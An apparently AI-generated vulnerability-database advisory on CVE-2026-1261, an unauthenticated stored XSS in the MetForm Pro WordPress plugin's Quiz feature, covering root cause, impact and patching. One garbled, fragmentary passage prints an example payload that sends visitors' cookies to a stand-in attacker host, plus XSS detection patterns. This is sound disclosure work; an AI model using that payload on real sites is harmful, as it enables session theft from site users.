
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1261 is a Stored Cross-Site Scripting (XSS) vulnerability in the MetForm Pro plugin for WordPress, affecting all versions up to and including 3.9.6. The flaw exists in the plugin's Quiz feature due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts into pages that execute when any user visits the affected page. It was published on March 10, 2026, with Wordfence credited as the assigner. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the MetForm Pro plugin's Quiz feature failing to properly sanitize user-supplied input before storing it and escaping it before rendering it in HTML output. Specifically, vulnerable code paths have been identified in core/features/quiz/loader.php at lines 69, 85, and 121 of the 3.9.5 tag. Because no authentication is required and user interaction is not needed at the injection stage, an unauthenticated attacker can submit a crafted payload through the Quiz feature that is then persistently stored and executed in the browser of any subsequent visitor (Wordfence, WordPress Trac).
Successful exploitation allows an unauthenticated attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the context of any user's browser who visits the affected page — including administrators. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts), defacement, or redirection to malicious sites. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the vulnerable component to the browsers of site visitors (Wordfence, Red Hat CVE).
No evidence of active in-the-wild exploitation or inclusion in CISA's Known Exploited Vulnerabilities (KEV) catalog has been reported for this CVE. The EPSS score is approximately 0.07%, indicating a low probability of exploitation in the near term. No public proof-of-concept exploit code or threat actor attribution has been identified. However, the unauthenticated nature of the attack vector (no privileges or user interaction required at injection time) makes it relatively straightforward to exploit if a site is running a vulnerable version (Wordfence, Red Hat CVE).
/wp-content/plugins/metform-pro/) using tools like WPScan or Shodan.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) to be injected into a quiz input field that is insufficiently sanitized.loader.php lines 69, 85, or 121). The payload is stored in the WordPress database.%3Cscript%3E, onerror=, onload=).<script> tags or JavaScript URIs.Site administrators should update the MetForm Pro plugin to version 3.9.7 or later, which addresses the insufficient input sanitization and output escaping in the Quiz feature. As an interim measure, disabling the Quiz feature within MetForm Pro or restricting access to quiz submission pages to authenticated users only can reduce exposure. Implementing a Web Application Firewall (WAF) with XSS filtering rules — such as those provided by Wordfence — can help block exploitation attempts while a patch is applied (Wordfence, WPmet Roadmap).
Wordfence, which discovered and assigned the CVE, published the vulnerability in their weekly WordPress vulnerability report for the week of March 9–15, 2026, highlighting it as part of a broader set of plugin vulnerabilities (Wordfence Weekly Report). The vulnerability was also noted by automated threat intelligence aggregators including Offseq and VulDB shortly after disclosure, with limited broader community discussion observed (Offseq).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."